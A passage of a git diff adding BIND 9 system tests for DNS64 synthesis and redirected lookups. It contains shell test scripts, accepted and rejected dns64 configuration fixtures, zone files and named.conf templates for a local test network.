dig.out.ns1.test$n > /dev/null || ret=1 +[ "$ret" -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +newtest "checking redirected lookup for nonexistent name" +$DIG $DIGOPTS @10.53.0.1 unexists a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^unexists.*A.*100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking no redirected lookup for nonexistent type" +$DIG $DIGOPTS @10.53.0.1 exists aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking redirected lookup for a long nonexistent name" +$DIG $DIGOPTS @10.53.0.1 long.name.is.not.there a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "^long.name.*A.*100.100.100.3" dig.out.ns1.test$n > /dev/null || ret=1 +grep "flags:[^;]* aa[ ;]" dig.out.ns1.test$n > /dev/null || ret=1 +lookups=`grep "lookup #.*\.not\.there" ns1/named.run | wc -l` +[ "$lookups" -eq 1 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "checking ECS data is passed to driver in clientinfo" +$DIG $DIGOPTS +short +subnet=192.0/16 source-addr.example.nil txt > dig.out.ns1.test$n.1 || ret=1 +grep "192.0.0.0/16/0" dig.out.ns1.test$n.1 > /dev/null || ret=1 +$DIG $DIGOPTS +short source-addr.example.nil txt > dig.out.ns1.test$n.2 || ret=1 +grep "not.*present" dig.out.ns1.test$n.2 > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/dns64/clean.sh b/bin/tests/system/dns64/clean.sh new file mode 100644 index 0000000..b773e2d --- /dev/null +++ b/bin/tests/system/dns64/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f ns1/K* +rm -f ns1/signed.db* +rm -f ns1/dsset-signed. +rm -f */named.memstats +rm -f */named.run +rm -f dig.out.* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/dns64/conf/bad1.conf b/bin/tests/system/dns64/conf/bad1.conf new file mode 100644 index 0000000..a4b7e7f --- /dev/null +++ b/bin/tests/system/dns64/conf/bad1.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/0 { }; +}; diff --git a/bin/tests/system/dns64/conf/bad10.conf b/bin/tests/system/dns64/conf/bad10.conf new file mode 100644 index 0000000..21855f6 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad10.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:0100:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad11.conf b/bin/tests/system/dns64/conf/bad11.conf new file mode 100644 index 0000000..c3bdd92 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad11.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:0200:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad12.conf b/bin/tests/system/dns64/conf/bad12.conf new file mode 100644 index 0000000..6ffe720 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad12.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:0400:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad13.conf b/bin/tests/system/dns64/conf/bad13.conf new file mode 100644 index 0000000..dc6c064 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad13.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:0800:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad14.conf b/bin/tests/system/dns64/conf/bad14.conf new file mode 100644 index 0000000..985101a --- /dev/null +++ b/bin/tests/system/dns64/conf/bad14.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:1000:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad15.conf b/bin/tests/system/dns64/conf/bad15.conf new file mode 100644 index 0000000..0931a55 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad15.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:2000:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad16.conf b/bin/tests/system/dns64/conf/bad16.conf new file mode 100644 index 0000000..3a8b962 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad16.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:4000:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad17.conf b/bin/tests/system/dns64/conf/bad17.conf new file mode 100644 index 0000000..6c9079b --- /dev/null +++ b/bin/tests/system/dns64/conf/bad17.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 0000:0000:0000:0000:8000:000f::/96 { }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad18.conf b/bin/tests/system/dns64/conf/bad18.conf new file mode 100644 index 0000000..566e177 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad18.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/32 { suffix ::8000:0000:0000:0000; }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad19.conf b/bin/tests/system/dns64/conf/bad19.conf new file mode 100644 index 0000000..8a9fb76 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad19.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/32 { suffix ::0100:0000:0000:0000; }; /* bits [64..71] MBZ */ +}; diff --git a/bin/tests/system/dns64/conf/bad2.conf b/bin/tests/system/dns64/conf/bad2.conf new file mode 100644 index 0000000..d275998 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/96 { suffix ::1; }; +}; diff --git a/bin/tests/system/dns64/conf/bad3.conf b/bin/tests/system/dns64/conf/bad3.conf new file mode 100644 index 0000000..24971b3 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad3.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/96 { suffix 127.0.0.1; }; +}; diff --git a/bin/tests/system/dns64/conf/bad4.conf b/bin/tests/system/dns64/conf/bad4.conf new file mode 100644 index 0000000..bc73ca5 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad4.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/129 { }; +}; diff --git a/bin/tests/system/dns64/conf/bad5.conf b/bin/tests/system/dns64/conf/bad5.conf new file mode 100644 index 0000000..bc73ca5 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad5.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 ::/129 { }; +}; diff --git a/bin/tests/system/dns64/conf/bad6.conf b/bin/tests/system/dns64/conf/bad6.conf new file mode 100644 index 0000000..1d85ab9 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad6.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 :: { }; +}; diff --git a/bin/tests/system/dns64/conf/bad7.conf b/bin/tests/system/dns64/conf/bad7.conf new file mode 100644 index 0000000..afbf437 --- /dev/null +++ b/bin/tests/system/dns64/conf/bad7.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 FC36:EAFE:F993::/64 { + exclude { bogusacl; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/bad8.conf b/bin/tests/system/dns64/conf/bad8.conf new file mode 100644 index 0000000..9aa423f --- /dev/null +++ b/bin/tests/system/dns64/conf/bad8.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 FC36:EAFE:F993::/64 { + clients { bogusacl; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/bad9.conf b/bin/tests/system/dns64/conf/bad9.conf new file mode 100644 index 0000000..b74204c --- /dev/null +++ b/bin/tests/system/dns64/conf/bad9.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + dns64 FC36:EAFE:F993::/64 { + mapped { bogusacl; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/good1.conf b/bin/tests/system/dns64/conf/good1.conf new file mode 100644 index 0000000..d84733e --- /dev/null +++ b/bin/tests/system/dns64/conf/good1.conf @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; +options { + /* Well Known Prefix */ + dns64 64:FF9B::/96 { + clients { any; }; + mapped { !rfc1918; any; }; + exclude { ::ffff:0:0/96; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/good2.conf b/bin/tests/system/dns64/conf/good2.conf new file mode 100644 index 0000000..41b5730 --- /dev/null +++ b/bin/tests/system/dns64/conf/good2.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; +options { + /* Well Known Prefix */ + dns64 64:FF9B::/96 { + mapped { !rfc1918; any; }; + exclude { ::ffff:0:0/96; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/good3.conf b/bin/tests/system/dns64/conf/good3.conf new file mode 100644 index 0000000..450b2e0 --- /dev/null +++ b/bin/tests/system/dns64/conf/good3.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; +options { + /* Well Known Prefix */ + dns64 64:FF9B::/96 { + clients { any; }; + exclude { ::ffff:0:0/96; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/good4.conf b/bin/tests/system/dns64/conf/good4.conf new file mode 100644 index 0000000..2c57f23 --- /dev/null +++ b/bin/tests/system/dns64/conf/good4.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; +options { + /* Well Known Prefix */ + dns64 64:FF9B::/96 { + clients { any; }; + mapped { !rfc1918; any; }; + }; +}; diff --git a/bin/tests/system/dns64/conf/good5.conf b/bin/tests/system/dns64/conf/good5.conf new file mode 100644 index 0000000..f6027a4 --- /dev/null +++ b/bin/tests/system/dns64/conf/good5.conf @@ -0,0 +1,18 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; +options { + /* Well Known Prefix */ + dns64 64:FF9B::/96 { }; +}; diff --git a/bin/tests/system/dns64/ns1/example.db b/bin/tests/system/dns64/ns1/example.db new file mode 100644 index 0000000..8253f1d --- /dev/null +++ b/bin/tests/system/dns64/ns1/example.db @@ -0,0 +1,56 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 marka.isc.org. 0 0 0 0 1200 +@ NS ns1 +ns1 A 10.53.0.1 +excluded-good-a AAAA 2001:eeee::1 + A 1.2.3.4 +excluded-bad-a AAAA 2001:eeee::2 + A 10.0.0.1 +excluded-only AAAA 2001:eeee::3 +partially-excluded-good-a AAAA 2001:eeee::1 + AAAA 2001::1 + A 1.2.3.4 +partially-excluded-bad-a AAAA 2001:eeee::2 + AAAA 2001::2 + A 10.0.0.1 +partially-excluded-only AAAA 2001:eeee::3 + AAAA 2001::3 +a-only A 1.2.3.5 +a-and-aaaa AAAA 2001::1 + A 1.2.3.6 +aaaa-only AAAA 2001::2 +a-not-mapped A 10.0.0.2 +a-and-mapped AAAA ::ffff:1.2.3.4 + A 1.2.3.5 +a-and-aaaa-and-mapped AAAA 2001:eeee::4 +a-and-aaaa-and-mapped AAAA ::ffff:1.2.3.4 +a-and-aaaa-and-mapped A 1.2.3.5 +mx-only MX 10 ns.example. +cname-excluded-good-a CNAME excluded-good-a +cname-excluded-bad-a CNAME excluded-bad-a +cname-excluded-only CNAME excluded-only +cname-partial-excluded-good-a CNAME partial-excluded-good-a +cname-partial-excluded-bad-a CNAME partial-excluded-bad-a +cname-partial-excluded-only CNAME partial-excluded-only +cname-a-only CNAME a-only +cname-a-and-aaaa CNAME a-and-aaaa +cname-aaaa-only CNAME aaaa-only +cname-a-not-mapped CNAME a-not-mapped +cname-mx-only CNAME mx-only +cname-non-existent CNAME non-existent +ttl-less-than-600 500 A 5.6.7.8 +ttl-more-than-600 700 A 5.6.7.8 +ttl-less-than-minimum 1100 A 5.6.7.8 +ttl-more-than-minimum 1300 A 5.6.7.8 +rpz 1500 A 99.99.99.99 diff --git a/bin/tests/system/dns64/ns1/named.conf.in b/bin/tests/system/dns64/ns1/named.conf.in new file mode 100644 index 0000000..a118525 --- /dev/null +++ b/bin/tests/system/dns64/ns1/named.conf.in @@ -0,0 +1,54 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS1 + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + allow-recursion { 10.53.0.1; }; + notify yes; + dnssec-validation yes; + + dns64 2001:bbbb::/96 { + clients { any; }; + mapped { !rfc1918; any; }; + exclude { 2001:eeee::/32; 64:FF9B::/96; ::ffff:0000:0000/96; }; + suffix ::; + recursive-only yes; + }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "signed" { + type primary; + file "signed.db.signed"; +}; + +// include "trusted.conf"; diff --git a/bin/tests/system/dns64/ns1/root.db b/bin/tests/system/dns64/ns1/root.db new file mode 100644 index 0000000..0e3bbee --- /dev/null +++ b/bin/tests/system/dns64/ns1/root.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0 +@ NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 +example NS ns1.example. +ns1.example. A 10.53.0.1 +signed NS ns1.example. +ns1.signed. A 10.53.0.1 diff --git a/bin/tests/system/dns64/ns1/sign.sh b/bin/tests/system/dns64/ns1/sign.sh new file mode 100644 index 0000000..9eff6e3 --- /dev/null +++ b/bin/tests/system/dns64/ns1/sign.sh @@ -0,0 +1,26 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=signed +infile=example.db +zonefile=signed.db + +key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM $zone) +key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -fk $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null diff --git a/bin/tests/system/dns64/ns2/named.conf.in b/bin/tests/system/dns64/ns2/named.conf.in new file mode 100644 index 0000000..be92d1a --- /dev/null +++ b/bin/tests/system/dns64/ns2/named.conf.in @@ -0,0 +1,71 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + + dns64 2001:aaaa::/96 { + clients { 10.53.0.2; }; + mapped { !rfc1918; any; }; + exclude { 2001:eeee::/32; 64:FF9B::/96; ::ffff:0000:0000/96; }; + suffix ::; + }; + + dns64 64:FF9B::/96 { + clients { 10.53.0.1; }; + mapped { !192.228.79.201; !rfc1918; any; }; + exclude { 64:FF9B::/96; ::ffff:0000:0000/96; }; + suffix ::; + }; + + dns64 2001:bbbb::/96 { + clients { 10.53.0.4; }; + mapped { !rfc1918; any; }; + suffix ::; + }; + + dns64-server "dns64.example.net."; + dns64-contact "hostmaster.example.net."; + dns64 2001:32::/32 { clients { 10.53.0.6; }; }; + dns64 2001:40::/40 { clients { 10.53.0.6; }; }; + dns64 2001:48::/48 { clients { 10.53.0.6; }; }; + dns64 2001:56::/56 { clients { 10.53.0.6; }; }; + dns64 2001:64::/64 { clients { 10.53.0.6; }; }; + + dns64 2001:96::/96 { clients { 10.53.0.7; }; }; + + response-policy { zone "rpz"; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "rpz" { + type primary; + file "rpz.db"; +}; diff --git a/bin/tests/system/dns64/ns2/rpz.db b/bin/tests/system/dns64/ns2/rpz.db new file mode 100644 index 0000000..014cbf0 --- /dev/null +++ b/bin/tests/system/dns64/ns2/rpz.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 ; 1 day +@ IN SOA rpz. noc.rpz. ( + 1 ; serial + 86400 ; refresh (1 day) + 3600 ; retry (1 hour) + 2592000 ; expire (4 weeks 2 days) + 25200 ; minimum (7 hours) + ) + NS @ + IN A 10.53.0.2 + +rpz.example IN A 10.10.10.10 diff --git a/bin/tests/system/dns64/setup.sh b/bin/tests/system/dns64/setup.sh new file mode 100644 index 0000000..24bd47c --- /dev/null +++ b/bin/tests/system/dns64/setup.sh @@ -0,0 +1,20 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf + +cd ns1 && $SHELL sign.sh diff --git a/bin/tests/system/dns64/tests.sh b/bin/tests/system/dns64/tests.sh new file mode 100644 index 0000000..230246a --- /dev/null +++ b/bin/tests/system/dns64/tests.sh @@ -0,0 +1,1406 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" + +for conf in conf/good*.conf +do + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + echo_i 